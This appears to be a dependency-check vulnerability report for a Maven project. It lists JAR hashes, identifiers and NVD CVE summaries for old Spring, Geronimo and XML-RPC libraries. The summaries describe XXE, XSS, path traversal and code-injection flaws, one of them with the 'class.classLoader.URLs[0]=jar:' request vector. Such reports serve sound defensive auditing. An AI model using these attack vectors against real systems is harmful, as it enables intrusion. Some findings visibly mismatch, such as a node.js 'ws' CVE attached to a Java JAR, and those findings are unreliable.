 StAX API is the standard java XML processing API defined by JSR-173

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/stax/stax-api/1.0.1/stax-api-1.0.1.jar
MD5: 7d436a53c64490bee564c576babb36b4
SHA1: 49c100caf72d658aca8e58bd74a4ba90fa2b0d70
SHA256:d1968436fc216c901fb9b82c7e878b50fd1d30091676da95b2edd3a9c0ccf92e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: stax:stax-api:1.0.1  Confidence:Highest

maven-scm-api-1.1.jar

Description:

 The SCM API provides mechanisms to manage all SCM tools.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-api/1.1/maven-scm-api-1.1.jar
MD5: 0f6531ffdf68a04468ab6a9d8a9b3f08
SHA1: eb12ceb959edaae4e157fe3337e2b3cbc94f27d4
SHA256:6310020460a9c9cc37b88355874e573f4dbeb11ff91745a0c5c17f7bd16b6006
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-api:1.1  Confidence:Highest

aopalliance-1.0.jar

Description:

 AOP Alliance

License:

Public Domain
File Path: /Users/Kevin/.m2/repository/aopalliance/aopalliance/1.0/aopalliance-1.0.jar
MD5: 04177054e180d09e3998808efa0401c7
SHA1: 0235ba8b489512805ac13a8f9ea77a1ca5ebe3e8
SHA256:0addec670fedcd3f113c5c8091d783280d23f75e3acb841b61a9cdb079376a08
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: aopalliance:aopalliance:1.0  Confidence:Highest

spring-core-2.5.6.jar

Description:

 Spring Framework: Core

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/springframework/spring-core/2.5.6/spring-core-2.5.6.jar
MD5: 378db2cc1fbdd9ed05dff2dc1023963e
SHA1: c450bc49099430e13d21548d1e3d1a564b7e35e9
SHA256:cf37656069488043c47f49a5520bb06d6879b63ef6044abb200c51a7ff2d6c49
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:vmware:springsource_spring_framework:2.5.6  Confidence:Low  
  • cpe: cpe:/a:pivotal_software:spring_framework:2.5.6  Confidence:Low  
  • cpe: cpe:/a:springsource:spring_framework:2.5.6  Confidence:Highest  
  • cpe: cpe:/a:pivotal:spring_framework:2.5.6  Confidence:Low  
  • maven: org.springframework:spring-core:2.5.6  Confidence:Highest

CVE-2010-1622  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Vulnerable Software & Versions: (show all)

CVE-2011-2730  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-16 Configuration

VMware SpringSource Spring Framework before 2.5.6.SEC03, 2.5.7.SR023, and 3.x before 3.0.6, when a container supports Expression Language (EL), evaluates EL expressions in tags twice, which allows remote attackers to obtain sensitive information via a (1) name attribute in a (a) spring:hasBindErrors tag; (2) path attribute in a (b) spring:bind or (c) spring:nestedpath tag; (3) arguments, (4) code, (5) text, (6) var, (7) scope, or (8) message attribute in a (d) spring:message or (e) spring:theme tag; or (9) var, (10) scope, or (11) value attribute in a (f) spring:transform tag, aka "Expression Language Injection."

Vulnerable Software & Versions: (show all)

CVE-2013-4152  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring OXM wrapper in Spring Framework before 3.2.4 and 4.0.0.M1, when using the JAXB marshaller, does not disable entity resolution, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via an XML external entity declaration in conjunction with an entity reference in a (1) DOMSource, (2) StAXSource, (3) SAXSource, or (4) StreamSource, aka an XML External Entity (XXE) issue.

Vulnerable Software & Versions: (show all)

CVE-2013-6429  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The SourceHttpMessageConverter in Spring MVC in Spring Framework before 3.2.5 and 4.0.0.M1 through 4.0.0.RC1 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152 and CVE-2013-7315.

Vulnerable Software & Versions: (show all)

CVE-2013-7315  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring MVC in Spring Framework before 3.2.4 and 4.0.0.M1 through 4.0.0.M2 does not disable external entity resolution for the StAX XMLInputFactory, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML with JAXB, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152.  NOTE: this issue was SPLIT from CVE-2013-4152 due to different affected versions.

Vulnerable Software & Versions: (show all)

CVE-2014-0054  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The Jaxb2RootElementHttpMessageConverter in Spring MVC in Spring Framework before 3.2.8 and 4.0.0 before 4.0.2 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4152, CVE-2013-7315, and CVE-2013-6429.

Vulnerable Software & Versions: (show all)

CVE-2014-1904  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Cross-site scripting (XSS) vulnerability in web/servlet/tags/form/FormTag.java in Spring MVC in Spring Framework 3.0.0 before 3.2.8 and 4.0.0 before 4.0.2 allows remote attackers to inject arbitrary web script or HTML via the requested URI in a default action.

Vulnerable Software & Versions: (show all)

CVE-2016-9878  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

An issue was discovered in Pivotal Spring Framework before 3.2.18, 4.2.x before 4.2.9, and 4.3.x before 4.3.5. Paths provided to the ResourceServlet were not properly sanitized and as a result exposed to directory traversal attacks.

Vulnerable Software & Versions: (show all)

CVE-2018-1270  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-358 Improperly Implemented Security Check for Standard

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

Vulnerable Software & Versions: (show all)

CVE-2018-1271  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.

Vulnerable Software & Versions: (show all)

CVE-2018-1272  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.

Vulnerable Software & Versions: (show all)

plexus-spring-1.2.jar

Description:

 Bridge utility to use plexus components in a SpringFramework context.

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-spring/1.2/plexus-spring-1.2.jar
MD5: f685d843ac463248f6d9021b844b27fe
SHA1: 3b81c51438e5c0a8bc5461041202d5647d13f8aa
SHA256:bd664b9e7dc1e8a4074b46a4a226522cd5fca18f049eff9ccf370db58eab278c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-spring:1.2  Confidence:Highest

geronimo-spec-jta-1.0.1B-rc2.jar

File Path: /Users/Kevin/.m2/repository/geronimo-spec/geronimo-spec-jta/1.0.1B-rc2/geronimo-spec-jta-1.0.1B-rc2.jar
MD5: d30af655d27dc060e0060caed2e8c398
SHA1: 3f4da55af12c3f8b1b36bc411d1915733b52cddc
SHA256:06dc7662747c495d8469aa35eda1d3c46b3c0eb0441f03809b6aa68537e4e1b5
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2008-0732  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-59 Improper Link Resolution Before File Access ('Link Following')

The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.

Vulnerable Software & Versions:

CVE-2011-5034  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.  NOTE: this might overlap CVE-2011-4461.

Vulnerable Software & Versions: (show all)

jdo2-api-2.0.jar

Description:

 The Java Data Objects 2.0 (JDO) API is a standard interface-based 
Java model abstraction of persistence, developed as Java Specification 
Request 243 under the auspices of the Java Community Process.

File Path: /Users/Kevin/.m2/repository/javax/jdo/jdo2-api/2.0/jdo2-api-2.0.jar
MD5: 5449e46a8f13c0788b8811ffd231c45f
SHA1: b7e19cbd9b2be71442b21c36847a7434d30d6886
SHA256:7462ac58a3ad8a2511cceabe3f98b94a15f087a4322baa4372a5478b480fb908
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.jdo:jdo2-api:2.0  Confidence:Highest

plexus-jdo2-1.0-alpha-8.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/plexus/plexus-jdo2/1.0-alpha-8/plexus-jdo2-1.0-alpha-8.jar
MD5: 7ed55617340fb8b1448c763fdeffb096
SHA1: 9f9ff7efefa282a0108624c4e4626e1b92c13646
SHA256:5c15529d5f45621844f60c7d86c6529c1bc1477ddfaf53fd52e509f3a57ead30
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.plexus:plexus-jdo2:1.0-alpha-8  Confidence:Highest

maven-settings-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-settings/2.0.9/maven-settings-2.0.9.jar
MD5: 6a19eb17efdb4e0c1dd65c32e87b1019
SHA1: ab8d338c00fab0db29af358ab0676c3c02d7329f
SHA256:1e5c98ebc4b9ae1f2c8d843c1dd9701a1c25b9afaff143c3e1fa4d90c22850fe
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-settings:2.0.9  Confidence:Highest

maven-profile-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-profile/2.0.9/maven-profile-2.0.9.jar
MD5: e1478a4633fef786e33e2717681fe199
SHA1: 0b9b02df9134bff9edb4f4e1624243d005895234
SHA256:88fe952eaf4e28da0533ceef5d8e9b7fc9f09f7f825ab342130bf4b8c3805664
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-profile:2.0.9  Confidence:Highest

maven-plugin-registry-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-plugin-registry/2.0.9/maven-plugin-registry-2.0.9.jar
MD5: 1f00b6993350f474c5ba3d2f216454f9
SHA1: a7172a87a7cb901cf6df4df9fd89a3c2d3f8a770
SHA256:5e6cc5d0501c8d9b9abf9605283e95733b9428c9033a079502cd4d97cd0c490e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-plugin-registry:2.0.9  Confidence:Highest

maven-project-2.0.9.jar

Description:

 This library is used to not only read Maven project object model files, but to assemble inheritence
    and to retrieve remote models as required.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-project/2.0.9/maven-project-2.0.9.jar
MD5: 5f83007173bd07249b00420ebbd813b0
SHA1: 30ec37813df5a212888a1f3df0b27497ecef4ad8
SHA256:c82db125f53716f59008e3214063869717a976bf857879de6d4092c73cdc7e12
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-project:2.0.9  Confidence:Highest

maven-model-2.0.9.jar

Description:

 Maven Model

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-model/2.0.9/maven-model-2.0.9.jar
MD5: 05fc405395b7dfdd0300929fb2a16bf2
SHA1: 9fb844625928dd992842e180853fbb2b197c9a9d
SHA256:87083dd97721542f2745eede587fbb6cb1aef2b395f46c2bd578c6d9d7b63521
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-model:2.0.9  Confidence:Highest

maven-artifact-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-artifact/2.0.9/maven-artifact-2.0.9.jar
MD5: c6f1bcc526bc0958dee6cd0fbc9a8dbe
SHA1: 66f0c8baa789fffdf54924cf395b26bbc2130435
SHA256:0b16842a33350f5478c4c717bf664251c27459ec5c0b8d0ca4d0050545aba48b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-artifact:2.0.9  Confidence:Highest

maven-repository-metadata-2.0.9.jar

Description:

 Maven Plugin Mapping

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-repository-metadata/2.0.9/maven-repository-metadata-2.0.9.jar
MD5: 566d26822d3f3fc8e6a884cd6809d70e
SHA1: dd79022a827b1d577865d5c97f8ad0c7d6b067b7
SHA256:2c302f060de887716be438e0eb0c3d89d7ece213631882446ee0b19880c00dbd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-repository-metadata:2.0.9  Confidence:Highest

wagon-provider-api-1.0-beta-2.jar

Description:

 Maven Wagon API that defines the contract between different Wagon implementations

File Path: /Users/Kevin/.m2/repository/org/apache/maven/wagon/wagon-provider-api/1.0-beta-2/wagon-provider-api-1.0-beta-2.jar
MD5: f41eb4e07a725eea3332743a29057855
SHA1: abd1c9ace6e87c94a4b91f5176aeb09d954b23a3
SHA256:0ba6040074d1e193580bae9314392940f5ecd81e3b6d3b3381050360dce033ad
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.wagon:wagon-provider-api:1.0-beta-2  Confidence:Highest

maven-artifact-manager-2.0.9.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/maven-artifact-manager/2.0.9/maven-artifact-manager-2.0.9.jar
MD5: 4940bb2f80c2c36f4b16250bbf383247
SHA1: 53224a5254101fb9b6d561d5a53c6d0817036d94
SHA256:d913865e03e719ac5733260019e98090a12b50683134e65f78c36e8d67f11ff1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven:maven-artifact-manager:2.0.9  Confidence:Highest

maven-scm-provider-accurev-1.1.jar

Description:

 SCM Provider implementation for AccuRev (http://www.accurev.com/).

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-accurev/1.1/maven-scm-provider-accurev-1.1.jar
MD5: ad7ebe5e2cc44cfa000e7ec358eb638c
SHA1: 10d68f31b82de859e9503136b4686a547cb3a9ca
SHA256:fb5c4cae9e4f967b5d9156133de2f063803bc9ebc7f83f0e3b5d8d1a7b727d4b
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-accurev:1.1  Confidence:Highest

maven-scm-provider-git-commons-1.1.jar

Description:

 Common library for SCM Git Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-git-commons/1.1/maven-scm-provider-git-commons-1.1.jar
MD5: 6f4fac925bd7f0d91fc2a6ad4956a47e
SHA1: 27b21c9c09bfb02002c103e965d8e4cdaa480229
SHA256:fefa7d23401cebbf5220471b999a455fccc7f43a354631247d4466307659600d
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-git-commons:1.1  Confidence:Highest

maven-scm-provider-gitexe-1.1.jar

Description:

 Executable implementation for SCM Git Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-gitexe/1.1/maven-scm-provider-gitexe-1.1.jar
MD5: 7c707ed22b1aa8fb588470f2187d308c
SHA1: d1ebbade131e07eb4149f5b0a454da2212634997
SHA256:33c308532240106dcee6945f82ee720e98db14df61f4cb5c7471b8800c1ec05b
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-gitexe:1.1  Confidence:Highest

maven-scm-provider-vss-1.1.jar

Description:

 SCM Provider implementation for VSS (http://msdn.microsoft.com/en-us/vstudio/aa700907.aspx).

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-vss/1.1/maven-scm-provider-vss-1.1.jar
MD5: 75f4a74bc5645bf2d2c859396d7a097b
SHA1: 58971b7a720cd21aa4ba5eb312769ad234352a4a
SHA256:7c7598a4e4ab0f11594b73471d7457f9d936d266bc81805068362eda2db211c2
Referenced In Project/Scope:trial:runtime

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-vss:1.1  Confidence:Highest

maven-scm-provider-cvs-commons-1.1.jar

Description:

 Common library for SCM CVS Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-cvs-commons/1.1/maven-scm-provider-cvs-commons-1.1.jar
MD5: c837e53c38f0dea4fa7c560317b16ab1
SHA1: 198d03e76ab1f5f8b9379f7f52834c92a73ae42b
SHA256:48b7b42ed37d61209b1b5a442c1618e815abe373ea78f8f4ea5db6a0f65943a7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-cvs-commons:1.1  Confidence:Highest

maven-scm-provider-svn-commons-1.1.jar

Description:

 Common library for SCM SVN Provider.

File Path: /Users/Kevin/.m2/repository/org/apache/maven/scm/maven-scm-provider-svn-commons/1.1/maven-scm-provider-svn-commons-1.1.jar
MD5: 2a07d9204f1b46fc9ee3f123a2640327
SHA1: 8be8b282cfd6b6ca9787a53945d63042a679fbc4
SHA256:96c2e236e53a59d7cefa411c642b2ab0f5857f1e4f45df5985d15527c0ca1f89
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-svn-commons:1.1  Confidence:Highest

spring-web-2.5.1.jar

Description:

 Spring Framework: Web

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/springframework/spring-web/2.5.1/spring-web-2.5.1.jar
MD5: 1c23331319bd9e110e1165ffb4d69281
SHA1: d9d2cd14ad9e0e9a9107af7c390dcfa156451614
SHA256:c2ddf7abcb6a6fbcfda05cab754c54a99888c08e4981c967b3eaebdffc91d697
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:vmware:springsource_spring_framework:2.5.1  Confidence:Low  
  • maven: org.springframework:spring-web:2.5.1  Confidence:Highest
  • cpe: cpe:/a:pivotal:spring_framework:2.5.1  Confidence:Low  
  • cpe: cpe:/a:pivotal_software:spring_framework:2.5.1  Confidence:Low  
  • cpe: cpe:/a:springsource:spring_framework:2.5.1  Confidence:Highest  

CVE-2010-1622  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Vulnerable Software & Versions: (show all)

CVE-2011-2730  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-16 Configuration

VMware SpringSource Spring Framework before 2.5.6.SEC03, 2.5.7.SR023, and 3.x before 3.0.6, when a container supports Expression Language (EL), evaluates EL expressions in tags twice, which allows remote attackers to obtain sensitive information via a (1) name attribute in a (a) spring:hasBindErrors tag; (2) path attribute in a (b) spring:bind or (c) spring:nestedpath tag; (3) arguments, (4) code, (5) text, (6) var, (7) scope, or (8) message attribute in a (d) spring:message or (e) spring:theme tag; or (9) var, (10) scope, or (11) value attribute in a (f) spring:transform tag, aka "Expression Language Injection."

Vulnerable Software & Versions: (show all)

CVE-2013-4152  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring OXM wrapper in Spring Framework before 3.2.4 and 4.0.0.M1, when using the JAXB marshaller, does not disable entity resolution, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via an XML external entity declaration in conjunction with an entity reference in a (1) DOMSource, (2) StAXSource, (3) SAXSource, or (4) StreamSource, aka an XML External Entity (XXE) issue.

Vulnerable Software & Versions: (show all)

CVE-2013-6429  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The SourceHttpMessageConverter in Spring MVC in Spring Framework before 3.2.5 and 4.0.0.M1 through 4.0.0.RC1 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152 and CVE-2013-7315.

Vulnerable Software & Versions: (show all)

CVE-2013-7315  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Spring MVC in Spring Framework before 3.2.4 and 4.0.0.M1 through 4.0.0.M2 does not disable external entity resolution for the StAX XMLInputFactory, which allows context-dependent attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML with JAXB, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152.  NOTE: this issue was SPLIT from CVE-2013-4152 due to different affected versions.

Vulnerable Software & Versions: (show all)

CVE-2014-0054  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The Jaxb2RootElementHttpMessageConverter in Spring MVC in Spring Framework before 3.2.8 and 4.0.0 before 4.0.2 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4152, CVE-2013-7315, and CVE-2013-6429.

Vulnerable Software & Versions: (show all)

CVE-2014-1904  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Cross-site scripting (XSS) vulnerability in web/servlet/tags/form/FormTag.java in Spring MVC in Spring Framework 3.0.0 before 3.2.8 and 4.0.0 before 4.0.2 allows remote attackers to inject arbitrary web script or HTML via the requested URI in a default action.

Vulnerable Software & Versions: (show all)

CVE-2016-9878  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

An issue was discovered in Pivotal Spring Framework before 3.2.18, 4.2.x before 4.2.9, and 4.3.x before 4.3.5. Paths provided to the ResourceServlet were not properly sanitized and as a result exposed to directory traversal attacks.

Vulnerable Software & Versions: (show all)

CVE-2018-1270  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-358 Improperly Implemented Security Check for Standard

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

Vulnerable Software & Versions: (show all)

CVE-2018-1271  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.

Vulnerable Software & Versions: (show all)

CVE-2018-1272  

Severity:Medium
CVSS Score: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.

Vulnerable Software & Versions: (show all)

xmlrpc-server-3.1.jar

File Path: /Users/Kevin/.m2/repository/org/apache/xmlrpc/xmlrpc-server/3.1/xmlrpc-server-3.1.jar
MD5: 7f6cfbfab89cde69b4a4541f8c8824fb
SHA1: e5d7c821560950cec129f787a840e1d22ddb93d5
SHA256:44bf076bf5cb4b5ef81fcd92069e53ef8b1e4564ac2405208d140fd35eb6394d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.xmlrpc:xmlrpc-server:3.1  Confidence:Highest
  • cpe: cpe:/a:apache:xml-rpc:3.1.3  Confidence:Low  

CVE-2016-5002  

Severity:High
CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD.

Vulnerable Software & Versions:

atlassian-xmlrpc-binder-server-spring-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-server-spring/0.8.2/atlassian-xmlrpc-binder-server-spring-0.8.2.jar
MD5: 7a0faf307a48729a74923f3a0cd1f536
SHA1: 6c63b04d743b480dc0191a7f2436bd11b75acff3
SHA256:2ce7c7f5a7e8b2dc5f59b87d911112c0e6078bcc648120e8d22d4010de7f2823
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-server-spring:0.8.2  Confidence:Highest
  • cpe: cpe:/a:apache:xml-rpc:0.8.2  Confidence:Low  

ws-commons-util-1.0.2.jar

Description:

 
      This is a small collection of utility classes, that allow high performance XML
      processing based on SAX. Basically, it is assumed, that you are using an JAXP
      1.1 compliant XML parser and nothing else. In particular, no dependency on the
      javax.xml.transform package is introduced.
    

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/ws/commons/util/ws-commons-util/1.0.2/ws-commons-util-1.0.2.jar
MD5: e0d2efe441e2dec803c7749c10725f61
SHA1: 3f478e6def772c19d1053f61198fa1f6a6119238
SHA256:97c183d35b596c6a010dfea967ca1e67f67696806535dcef5be17ffb2692cfd6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.ws.commons.util:ws-commons-util:1.0.2  Confidence:Highest
  • cpe: cpe:/a:ws_project:ws:1.0.2  Confidence:Low  

CVE-2016-10542  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

ws is a "simple to use, blazing fast and thoroughly tested websocket client, server and console for node.js, up-to-date against RFC-6455". By sending an overly long websocket payload to a `ws` server, it is possible to crash the node process. This affects ws 1.1.0 and earlier.

Vulnerable Software & Versions:

atlassian-xmlrpc-binder-support-0.8.2.jar

File Path: /Users/Kevin/.m2/repository/com/atlassian/xmlrpc/atlassian-xmlrpc-binder-support/0.8.2/atlassian-xmlrpc-binder-support-0.8.2.jar
MD5: be3c899f63cdff9e526b18460907ef7f
SHA1: b31a9a68e2ef882000c31fe856760ae4d7b46293
SHA256:d16ac5d3f39d8561c64090b9eab40ecea0e7e448abfe46692233aa16fbd1f9e5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.atlassian.xmlrpc:atlassian-xmlrpc-binder-support:0.8.2  Confidence:Highest

atlassian-xmlrpc-binder-server-0.8.2.jar

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
